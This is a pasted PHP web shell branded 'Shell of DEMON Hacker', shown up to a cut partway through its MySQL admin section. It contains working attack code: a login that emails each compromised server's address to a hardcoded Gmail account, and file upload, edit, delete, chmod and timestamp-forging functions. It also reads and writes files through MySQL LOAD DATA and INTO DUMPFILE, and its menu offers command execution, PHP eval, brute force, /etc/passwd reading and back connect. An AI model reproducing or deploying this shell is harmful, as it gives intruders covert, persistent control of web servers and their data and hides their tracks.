· 7 years ago · Nov 08, 2018, 03:50 AM
1<?php error_reporting(7);
2@set_magic_quotes_runtime(0);
3ob_start();
4$mtime = explode(' ', microtime());
5$starttime = $mtime[1] + $mtime[0];
6define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)) . '/');
7//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
8define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
9define('IS_COM', class_exists('COM') ? 1 : 0);
10define('IS_GPC', get_magic_quotes_gpc());
11$dis_func = get_cfg_var('disable_functions');
12define('IS_PHPINFO', (!eregi("phpinfo", $dis_func)) ? 1 : 0);
13@set_time_limit(0);
14foreach (array('_GET', '_POST') as $_request) {
15 foreach ($$_request as $_key => $_value) {
16 if ($_key{0} != '_') {
17 if (IS_GPC) {
18 $_value = s_array($_value);
19 }
20 $$_key = $_value;
21 }
22 }
23}
24/*================= Info Login ================*/
25$admin = array();
26$admin['check'] = true;
27$admin['pass'] = 'niemdamme'; // Password login
28$admin['cookiepre'] = '';
29$admin['cookiedomain'] = '';
30$admin['cookiepath'] = '/';
31$admin['cookielife'] = 86400;
32/*===================== End =====================*/
33if ($charset == 'utf8') {
34 header("content-Type: text/html; charset=utf-8");
35} elseif ($charset == 'big5') {
36 header("content-Type: text/html; charset=big5");
37} elseif ($charset == 'gbk') {
38 header("content-Type: text/html; charset=gbk");
39} elseif ($charset == 'latin1') {
40 header("content-Type: text/html; charset=iso-8859-2");
41}
42$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
43$timestamp = time();
44/*===================== Login =====================*/
45if ($action == "logout") {
46 scookie('vbapass', '', -86400 * 365);
47 p('<meta http-equiv="refresh" content="0;URL=' . $self . '">');
48 p('<body style="background:#000">');
49 exit;
50}
51if ($admin['check']) {
52 if ($doing == 'login') {
53 if ($admin['pass'] == $password) {
54 scookie('vbapass', $password);
55 $time_shell = "" . date("d/m/Y - H:i:s") . "";
56 $ip_remote = $_SERVER["REMOTE_ADDR"];
57 $from_shellcode = 'shell@' . gethostbyname($_SERVER['SERVER_NAME']) . '';
58 $to_email = 'dimitriuskan@gmail.com';
59 $server_mail = "" . gethostbyname($_SERVER['SERVER_NAME']) . " - " . $_SERVER['HTTP_HOST'] . "";
60 $linkcr = "Link: " . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . " - IP Excuting: $ip_remote - Time: $time_shell";
61 $header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
62 @mail($to_email, $server_mail, $linkcr, $header);
63 p('<meta http-equiv="refresh" content="2;URL=' . $self . '">');
64 p('<body style="background:#000">
65
66<BR><BR><div align=center><font style="color:#00e400;">Welcome to Shell of DEMON Hacker! - Please wait...<BR><img src=http://i.imgur.com/UwF8H.gif></div>');
67 exit;
68 } else {
69 echo $err_mess;
70 }
71 }
72 if ($_COOKIE['vbapass']) {
73 if ($_COOKIE['vbapass'] != $admin['pass']) {
74 loginpage();
75 }
76 } else {
77 loginpage();
78 }
79}
80/*===================== Login =====================*/
81$errmsg = '';
82if ($action == 'phpinfo') {
83 if (IS_PHPINFO) {
84 phpinfo();
85 } else {
86 $errmsg = 'phpinfo() function has non-permissible';
87 }
88}
89if ($doing == 'downfile' && $thefile) {
90 if (!@file_exists($thefile)) {
91 $errmsg = 'The file you want Downloadable was nonexistent';
92 } else {
93 $fileinfo = pathinfo($thefile);
94 header('Content-type: application/x-' . $fileinfo['extension']);
95 header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
96 header('Content-Length: ' . filesize($thefile));
97 @readfile($thefile);
98 exit;
99 }
100}
101if ($doing == 'backupmysql' && !$saveasfile) {
102 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
103 $table = array_flip($table);
104 $result = q("SHOW tables");
105 if (!$result) p('<h2>' . mysql_error() . '</h2>');
106 $filename = basename($_SERVER['HTTP_HOST'] . 'sql.gz');
107 header('Content-type: application/unknown');
108 header('Content-Disposition: attachment; filename=' . $filename);
109 $mysqldata = '';
110 while ($currow = mysql_fetch_array($result)) {
111 if (isset($table[$currow[0]])) {
112 $mysqldata.= sqldumptable($currow[0]);
113 }
114 }
115 mysql_close();
116 exit;
117}
118if ($doing == 'mysqldown') {
119 if (!$dbname) {
120 $errmsg = 'Please input dbname';
121 } else {
122 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
123 if (!file_exists($mysqldlfile)) {
124 $errmsg = 'The file you want Downloadable was nonexistent';
125 } else {
126 $result = q("select load_file('$mysqldlfile');");
127 if (!$result) {
128 q("DROP TABLE IF EXISTS tmp_angel;");
129 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
130 q("LOAD DATA LOCAL INFILE '" . addslashes($mysqldlfile) . "' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
131 $result = q("select content from tmp_angel");
132 q("DROP TABLE tmp_angel");
133 }
134 $row = @mysql_fetch_array($result);
135 if (!$row) {
136 $errmsg = 'Load file failed ' . mysql_error();
137 } else {
138 $fileinfo = pathinfo($mysqldlfile);
139 header('Content-type: application/x-' . $fileinfo['extension']);
140 header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
141 header("Accept-Length: " . strlen($row[0]));
142 echo $row[0];
143 exit;
144 }
145 }
146 }
147}
148?>
149
150<html>
151
152<head>
153
154<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
155<link rel="icon" href="http://i568.photobucket.com/albums/ss123/wolftg/skull-1.gif" type="image/x-icon">
156<title><?php echo str_replace('.', '', '.Hacker DEMON Anonymous VN..'); ?></title>
157
158<style type="text/css">
159
160body,td{font: 10pt Tahoma;color:#f4f4f4;line-height: 16px;}
161
162
163img {outline:none;}
164a {color: #00e400;text-decoration:none;}
165
166a:hover{color: #f00;text-decoration:underline;}
167
168.alt1 td{border:none; padding:15px 15px 0px 15px;}
169
170.alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
171
172.focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
173
174.fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
175
176.fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#000;padding:5px 10px 5px 5px;}
177
178.head td{border-top:1px solid #00e400;border-bottom:1px solid #00e400;background:#000;padding:5px 10px 5px 5px;font-weight:bold;}
179
180.head_small td{background:#000;}
181
182.head td span{font-weight:normal;}
183
184form{margin:0;padding:0;}
185
186h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
187
188ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
189
190u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
191
192input, textarea, button
193{
194 font-size: 9pt;
195 color: #ccc;
196 font-family: verdana, sans-serif;
197 background: #000;
198 border: 1px solid #00e400;
199
200}
201select
202
203{
204
205 font-size: 8pt;
206
207 font-weight: normal;
208
209 color: #ccc;
210
211 font-family: verdana, sans-serif;
212
213 background-color: #000;
214
215}
216
217
218
219</style>
220
221<script type="text/javascript">
222
223function CheckAll(form) {
224
225 for(var i=0;i<form.elements.length;i++) {
226
227 var e = form.elements[i];
228
229 if (e.name != 'chkall')
230
231 e.checked = form.chkall.checked;
232
233 }
234
235}
236
237function $(id) {
238
239 return document.getElementById(id);
240
241}
242
243function goaction(act){
244
245 $('goaction').action.value=act;
246
247 $('goaction').submit();
248
249}
250
251</script>
252
253</head>
254
255<body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black style="background:#000">
256
257
258
259
260
261<div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
262
263 <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
264
265 <tr>
266
267 <td align="center" valign=center>
268
269 <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600" align="center">
270
271 Loading<img src="http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif">
272
273 </div>
274
275 </td>
276
277 </tr>
278
279 </table>
280
281</div>
282
283 <script>
284
285 var ld=(document.all);
286
287 var ns4=document.layers;
288
289 var ns6=document.getElementById&&!document.all;
290
291 var ie4=document.all;
292
293 if (ns4)
294
295 ld=document.loading;
296
297 else if (ns6)
298
299 ld=document.getElementById("loading").style;
300
301 else if (ie4)
302
303 ld=document.all.loading.style;
304
305 function init()
306
307 {
308
309 if(ns4){ld.visibility="hidden";}
310
311 else if (ns6||ie4) ld.display="none";
312
313 }
314
315 </script>
316
317
318
319
320
321
322
323
324
325<table width="100%" border="0" cellpadding="0" cellspacing="0">
326
327 <tr class="head_small">
328
329 <td width=100%>
330
331 <table width=100%><tr class="head_small"><td width="150px"><a href="<?php $self; ?>"><img src="http://pixaroma.com/wp-content/uploads/2016/02/Free-Hacker-Digital-Vector-Skull.png" width="195" height=240 border=0></a></td>
332
333 <td>
334
335 <span style="float:left;"> <?php echo "Hostname: " . $_SERVER['HTTP_HOST'] . ""; ?> | <a href="javascript:goaction('logout');"><font color=red>Logout</font></a></span></br>
336
337
338
339 <?php
340$curl_on = @function_exists('curl_version');
341$mysql_on = @function_exists('mysql_connect');
342$mssql_on = @function_exists('mssql_connect');
343$pg_on = @function_exists('pg_connect');
344$ora_on = @function_exists('ocilogon');
345echo (($safe_mode) ? ("Safe_mod: <b><font color=green>ON</font></b> - ") : ("Safe_mod: <b><font color=red>OFF</font></b> - "));
346echo "PHP version: <b>" . @phpversion() . "</b> - ";
347echo "cURL: " . (($curl_on) ? ("<b><font color=green>ON</font></b> - ") : ("<b><font color=red>OFF</font></b> - "));
348echo "MySQL: <b>";
349$mysql_on = @function_exists('mysql_connect');
350if ($mysql_on) {
351 echo "<font color=green>ON</font></b> - ";
352} else {
353 echo "<font color=red>OFF</font></b> - ";
354}
355echo "MSSQL: <b>";
356$mssql_on = @function_exists('mssql_connect');
357if ($mssql_on) {
358 echo "<font color=green>ON</font></b> - ";
359} else {
360 echo "<font color=red>OFF</font></b> - ";
361}
362echo "PostgreSQL: <b>";
363$pg_on = @function_exists('pg_connect');
364if ($pg_on) {
365 echo "<font color=green>ON</font></b> - ";
366} else {
367 echo "<font color=red>OFF</font></b> - ";
368}
369echo "Oracle: <b>";
370$ora_on = @function_exists('ocilogon');
371if ($ora_on) {
372 echo "<font color=green>ON</font></b>";
373} else {
374 echo "<font color=red>OFF</font></b><BR>";
375}
376echo "Disable functions : <b>";
377if ('' == ($df = @ini_get('disable_functions'))) {
378 echo "<font color=green>NONE</font></b><BR>";
379} else {
380 echo "<font color=red>$df</font></b><BR>";
381}
382echo "<font color=white>Uname -a</font>: " . @substr(@php_uname(), 0, 120) . "<br>";
383echo "<font color=white>Server</font>: " . @substr($SERVER_SOFTWARE, 0, 120) . " - <font color=white>id</font>: " . @getmyuid() . "(" . @get_current_user() . ") - uid=" . @getmyuid() . " (" . @get_current_user() . ") gid=" . @getmygid() . "(" . @get_current_user() . ")<br>";
384?> </td>
385
386 </tr></table></td>
387
388 </tr>
389
390 <tr class="alt1">
391
392 <td width=100%><span style="float:left;">[Server IP: <?php echo "<font color='#00e400'>" . gethostbyname($_SERVER['SERVER_NAME']) . "</font>"; ?> - Your IP: <?php echo "<font color='#00e400'>" . $_SERVER['REMOTE_ADDR'] . "</font>"; ?>] </span><br />
393<center>------------------------------------------------------------------------------------------</center><br />
394
395
396
397 <a href="javascript:goaction('file');">File Manager</a> |
398
399 <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
400
401 <a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |
402
403 <a href="javascript:goaction('shell');">Execute Command</a> |
404
405 <a href="javascript:goaction('phpenv');">PHP Variable</a> |
406
407 <a href="javascript:goaction('eval');">Eval PHP Code</a>
408
409 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('brute');">Brute</a> <?php
410} ?>
411
412 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php
413} ?>
414
415 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php
416} ?>
417
418 </td>
419
420 </tr>
421
422</table>
423
424<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
425
426<?php
427formhead(array('name' => 'goaction'));
428makehide('action');
429formfoot();
430$errmsg && m($errmsg);
431!$dir && $dir = '.';
432$nowpath = getPath(SA_ROOT, $dir);
433if (substr($dir, -1) != '/') {
434 $dir = $dir . '/';
435}
436$uedir = ue($dir);
437if (!$action || $action == 'file') {
438 $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
439 if ($doing == 'deldir' && $thefile) {
440 if (!file_exists($thefile)) {
441 m($thefile . ' directory does not exist');
442 } else {
443 m('Directory delete ' . (deltree($thefile) ? basename($thefile) . ' success' : 'failed'));
444 }
445 } elseif ($newdirname) {
446 $mkdirs = $nowpath . $newdirname;
447 if (file_exists($mkdirs)) {
448 m('Directory has already existed');
449 } else {
450 m('Directory created ' . (@mkdir($mkdirs, 0755) ? 'success' : 'failed'));
451 @chmod($mkdirs, 0755);
452 }
453 } elseif ($doupfile) {
454 m('File upload ' . (@copy($_FILES['uploadfile']['tmp_name'], $uploaddir . '/' . $_FILES['uploadfile']['name']) ? 'success' : 'failed'));
455 } elseif ($editfilename && $filecontent) {
456 $fp = @fopen($editfilename, 'w');
457 m('Save file ' . (@fwrite($fp, $filecontent) ? 'success' : 'failed'));
458 @fclose($fp);
459 } elseif ($pfile && $newperm) {
460 if (!file_exists($pfile)) {
461 m('The original file does not exist');
462 } else {
463 $newperm = base_convert($newperm, 8, 10);
464 m('Modify file attributes ' . (@chmod($pfile, $newperm) ? 'success' : 'failed'));
465 }
466 } elseif ($oldname && $newfilename) {
467 $nname = $nowpath . $newfilename;
468 if (file_exists($nname) || !file_exists($oldname)) {
469 m($nname . ' has already existed or original file does not exist');
470 } else {
471 m(basename($oldname) . ' renamed ' . basename($nname) . (@rename($oldname, $nname) ? ' success' : 'failed'));
472 }
473 } elseif ($sname && $tofile) {
474 if (file_exists($tofile) || !file_exists($sname)) {
475 m('The goal file has already existed or original file does not exist');
476 } else {
477 m(basename($tofile) . ' copied ' . (@copy($sname, $tofile) ? basename($tofile) . ' success' : 'failed'));
478 }
479 } elseif ($curfile && $tarfile) {
480 if (!@file_exists($curfile) || !@file_exists($tarfile)) {
481 m('The goal file has already existed or original file does not exist');
482 } else {
483 $time = @filemtime($tarfile);
484 m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
485 }
486 } elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
487 if (!@file_exists($curfile)) {
488 m(basename($curfile) . ' does not exist');
489 } else {
490 $time = strtotime("$year-$month-$day $hour:$minute:$second");
491 m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
492 }
493 } elseif ($doing == 'downrar') {
494 if ($dl) {
495 $dfiles = '';
496 foreach ($dl as $filepath => $value) {
497 $dfiles.= $filepath . ',';
498 }
499 $dfiles = substr($dfiles, 0, strlen($dfiles) - 1);
500 $dl = explode(',', $dfiles);
501 $zip = new PHPZip($dl);
502 $code = $zip->out;
503 header('Content-type: application/octet-stream');
504 header('Accept-Ranges: bytes');
505 header('Accept-Length: ' . strlen($code));
506 header('Content-Disposition: attachment;filename=' . $_SERVER['HTTP_HOST'] . 'sql.gz');
507 echo $code;
508 exit;
509 } else {
510 m('Please select file(s)');
511 }
512 } elseif ($doing == 'delfiles') {
513 if ($dl) {
514 $dfiles = '';
515 $succ = $fail = 0;
516 foreach ($dl as $filepath => $value) {
517 if (@unlink($filepath)) {
518 $succ++;
519 } else {
520 $fail++;
521 }
522 }
523 m('Deleted file have finished??choose ' . count($dl) . ' success ' . $succ . ' fail ' . $fail);
524 } else {
525 m('Please select file(s)');
526 }
527 }
528 formhead(array('name' => 'createdir'));
529 makehide('newdirname');
530 makehide('dir', $nowpath);
531 formfoot();
532 formhead(array('name' => 'fileperm'));
533 makehide('newperm');
534 makehide('pfile');
535 makehide('dir', $nowpath);
536 formfoot();
537 formhead(array('name' => 'copyfile'));
538 makehide('sname');
539 makehide('tofile');
540 makehide('dir', $nowpath);
541 formfoot();
542 formhead(array('name' => 'rename'));
543 makehide('oldname');
544 makehide('newfilename');
545 makehide('dir', $nowpath);
546 formfoot();
547 formhead(array('name' => 'fileopform'));
548 makehide('action');
549 makehide('opfile');
550 makehide('dir');
551 formfoot();
552 $free = @disk_free_space($nowpath);
553 !$free && $free = 0;
554 $all = @disk_total_space($nowpath);
555 !$all && $all = 0;
556 $used = $all - $free;
557 $used_percent = @round(100 / ($all / $free), 2);
558 p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>' . sizecount($free) . '</font> of <font color=red>' . sizecount($all) . '</font> (<font color=red>' . $used_percent . '</font>%)</font>');
559?>
560
561<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
562
563 <form action="" method="post" id="godir" name="godir">
564
565 <tr>
566
567 <td nowrap>Current Directory (<?php echo $dir_writeable; ?>, <?php echo getChmod($nowpath); ?>)</td>
568
569 <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath; ?>" type="text" style="width:100%;margin:0 8px;"></td>
570
571 <td nowrap><input class="bt" value="GO" type="submit"></td>
572
573 </tr>
574
575 </form>
576
577</table>
578
579<script type="text/javascript">
580
581function createdir(){
582
583 var newdirname;
584
585 newdirname = prompt('Please input the directory name:', '');
586
587 if (!newdirname) return;
588
589 $('createdir').newdirname.value=newdirname;
590
591 $('createdir').submit();
592
593}
594
595function fileperm(pfile){
596
597 var newperm;
598
599 newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
600
601 if (!newperm) return;
602
603 $('fileperm').newperm.value=newperm;
604
605 $('fileperm').pfile.value=pfile;
606
607 $('fileperm').submit();
608
609}
610
611function copyfile(sname){
612
613 var tofile;
614
615 tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
616
617 if (!tofile) return;
618
619 $('copyfile').tofile.value=tofile;
620
621 $('copyfile').sname.value=sname;
622
623 $('copyfile').submit();
624
625}
626
627function rename(oldname){
628
629 var newfilename;
630
631 newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
632
633 if (!newfilename) return;
634
635 $('rename').newfilename.value=newfilename;
636
637 $('rename').oldname.value=oldname;
638
639 $('rename').submit();
640
641}
642
643function dofile(doing,thefile,m){
644
645 if (m && !confirm(m)) {
646
647 return;
648
649 }
650
651 $('filelist').doing.value=doing;
652
653 if (thefile){
654
655 $('filelist').thefile.value=thefile;
656
657 }
658
659 $('filelist').submit();
660
661}
662
663function createfile(nowpath){
664
665 var filename;
666
667 filename = prompt('Please input the file name:', '');
668
669 if (!filename) return;
670
671 opfile('editfile',nowpath + filename,nowpath);
672
673}
674
675function opfile(action,opfile,dir){
676
677 $('fileopform').action.value=action;
678
679 $('fileopform').opfile.value=opfile;
680
681 $('fileopform').dir.value=dir;
682
683 $('fileopform').submit();
684
685}
686
687function godir(dir,view_writable){
688
689 if (view_writable) {
690
691 $('godir').view_writable.value=1;
692
693 }
694
695 $('godir').dir.value=dir;
696
697 $('godir').submit();
698
699}
700
701</script>
702
703 <?php
704 tbhead();
705 p('<form action="' . $self . '" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
706 p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="' . $dir . '" type="hidden" /><input name="dir" value="' . $dir . '" type="hidden" /></div>');
707 p('<a href="javascript:godir(\'' . $_SERVER["DOCUMENT_ROOT"] . '\');">WebRoot</a>');
708 if ($view_writable) {
709 p(' | <a href="javascript:godir(\'' . $nowpath . '\');">View All</a>');
710 } else {
711 p(' | <a href="javascript:godir(\'' . $nowpath . '\',\'1\');">View Writable</a>');
712 }
713 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\'' . $nowpath . '\');">Create File</a>');
714 if (IS_WIN && IS_COM) {
715 $obj = new COM('scripting.filesystemobject');
716 if ($obj && is_object($obj)) {
717 $DriveTypeDB = array(0 => 'Unknow', 1 => 'Removable', 2 => 'Fixed', 3 => 'Network', 4 => 'CDRom', 5 => 'RAM Disk');
718 foreach ($obj->Drives as $drive) {
719 if ($drive->DriveType == 2) {
720 p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Size:' . sizecount($drive->TotalSize) . ' Free:' . sizecount($drive->FreeSpace) . ' Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
721 } else {
722 p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
723 }
724 }
725 }
726 }
727 p('</td></tr></form>');
728 p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
729 $dirdata = array();
730 $filedata = array();
731 if ($view_writable) {
732 $dirdata = GetList($nowpath);
733 } else {
734 $dirs = @opendir($dir);
735 while ($file = @readdir($dirs)) {
736 $filepath = $nowpath . $file;
737 if (@is_dir($filepath)) {
738 $dirdb['filename'] = $file;
739 $dirdb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
740 $dirdb['dirchmod'] = getChmod($filepath);
741 $dirdb['dirperm'] = getPerms($filepath);
742 $dirdb['fileowner'] = getUser($filepath);
743 $dirdb['dirlink'] = $nowpath;
744 $dirdb['server_link'] = $filepath;
745 $dirdb['client_link'] = ue($filepath);
746 $dirdata[] = $dirdb;
747 } else {
748 $filedb['filename'] = $file;
749 $filedb['size'] = sizecount(@filesize($filepath));
750 $filedb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
751 $filedb['filechmod'] = getChmod($filepath);
752 $filedb['fileperm'] = getPerms($filepath);
753 $filedb['fileowner'] = getUser($filepath);
754 $filedb['dirlink'] = $nowpath;
755 $filedb['server_link'] = $filepath;
756 $filedb['client_link'] = ue($filepath);
757 $filedata[] = $filedb;
758 }
759 }
760 unset($dirdb);
761 unset($filedb);
762 @closedir($dirs);
763 }
764 @sort($dirdata);
765 @sort($filedata);
766 $dir_i = '0';
767 foreach ($dirdata as $key => $dirdb) {
768 if ($dirdb['filename'] != '..' && $dirdb['filename'] != '.') {
769 $thisbg = bg();
770 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
771 p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
772 p('<td><a href="javascript:godir(\'' . $dirdb['server_link'] . '\');">' . $dirdb['filename'] . '</a></td>');
773 p('<td nowrap>' . $dirdb['mtime'] . '</td>');
774 p('<td nowrap>--</td>');
775 p('<td nowrap>');
776 p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirchmod'] . '</a> / ');
777 p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirperm'] . '</a>' . $dirdb['fileowner'] . '</td>');
778 p('<td nowrap><a href="javascript:dofile(\'deldir\',\'' . $dirdb['server_link'] . '\',\'Are you sure will delete ' . $dirdb['filename'] . '? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\'' . $dirdb['server_link'] . '\');">Rename</a></td>');
779 p('</tr>');
780 $dir_i++;
781 } else {
782 if ($dirdb['filename'] == '..') {
783 p('<tr class=fout>');
784 p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\'' . getUpPath($nowpath) . '\');">Parent Directory</a></td>');
785 p('</tr>');
786 }
787 }
788 }
789 p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
790 p('<form id="filelist" name="filelist" action="' . $self . '" method="post">');
791 makehide('action', 'file');
792 makehide('thefile');
793 makehide('doing');
794 makehide('dir', $nowpath);
795 $file_i = '0';
796 foreach ($filedata as $key => $filedb) {
797 if ($filedb['filename'] != '..' && $filedb['filename'] != '.') {
798 $fileurl = str_replace(SA_ROOT, '', $filedb['server_link']);
799 $thisbg = bg();
800 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
801 p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl[' . $filedb['server_link'] . ']"></td>');
802 p('<td><a href="' . $fileurl . '" target="_blank">' . $filedb['filename'] . '</a></td>');
803 p('<td nowrap>' . $filedb['mtime'] . '</td>');
804 p('<td nowrap>' . $filedb['size'] . '</td>');
805 p('<td nowrap>');
806 p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['filechmod'] . '</a> / ');
807 p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['fileperm'] . '</a>' . $filedb['fileowner'] . '</td>');
808 p('<td nowrap>');
809 p('<a href="javascript:dofile(\'downfile\',\'' . $filedb['server_link'] . '\');">Down</a> | ');
810 p('<a href="javascript:copyfile(\'' . $filedb['server_link'] . '\');">Copy</a> | ');
811 p('<a href="javascript:opfile(\'editfile\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Edit</a> | ');
812 p('<a href="javascript:rename(\'' . $filedb['server_link'] . '\');">Rename</a> | ');
813 p('<a href="javascript:opfile(\'newtime\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Time</a>');
814 p('</td></tr>');
815 $file_i++;
816 }
817 }
818 p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">' . $dir_i . ' directories / ' . $file_i . ' files</td></tr>');
819 p('</form></table>');
820} elseif ($action == 'sqlfile') {
821 if ($doing == "mysqlupload") {
822 $file = $_FILES['uploadfile'];
823 $filename = $file['tmp_name'];
824 if (file_exists($savepath)) {
825 m('The goal file has already existed');
826 } else {
827 if (!$filename) {
828 m('Please choose a file');
829 } else {
830 $fp = @fopen($filename, 'r');
831 $contents = @fread($fp, filesize($filename));
832 @fclose($fp);
833 $contents = bin2hex($contents);
834 if (!$upname) $upname = $file['name'];
835 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
836 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
837 m($result ? 'Upload success' : 'Upload has failed: ' . mysql_error());
838 }
839 }
840 }
841?>
842
843<script type="text/javascript">
844
845function mysqlfile(doing){
846
847 if(!doing) return;
848
849 $('doing').value=doing;
850
851 $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
852
853 $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
854
855 $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
856
857 $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
858
859 $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
860
861 $('mysqlfile').charset.value=$('dbinfo').charset.value;
862
863 $('mysqlfile').submit();
864
865}
866
867</script>
868
869<?php
870 !$dbhost && $dbhost = 'localhost';
871 !$dbuser && $dbuser = 'root';
872 !$dbport && $dbport = '3306';
873 $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
874 formhead(array('title' => 'MYSQL Information', 'name' => 'dbinfo'));
875 makehide('action', 'sqlfile');
876 p('<p>');
877 p('DBHost:');
878 makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
879 p(':');
880 makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
881 p('DBUser:');
882 makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
883 p('DBPass:');
884 makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
885 p('DBName:');
886 makeinput(array('name' => 'dbname', 'size' => 15, 'value' => $dbname));
887 p('DBCharset:');
888 makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
889 p('</p>');
890 formfoot();
891 p('<form action="' . $self . '" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
892 p('<h2>Upload file</h2>');
893 p('<p><b>This operation the DB user must has FILE privilege</b></p>');
894 p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
895 p('<h2>Download file</h2>');
896 p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
897 makehide('dbhost');
898 makehide('dbport');
899 makehide('dbuser');
900 makehide('dbpass');
901 makehide('dbname');
902 makehide('charset');
903 makehide('doing');
904 makehide('action', 'sqlfile');
905 p('</form>');
906} elseif ($action == 'sqladmin') {
907 !$dbhost && $dbhost = 'localhost';
908 !$dbuser && $dbuser = 'root';
909 !$dbport && $dbport = '3306';
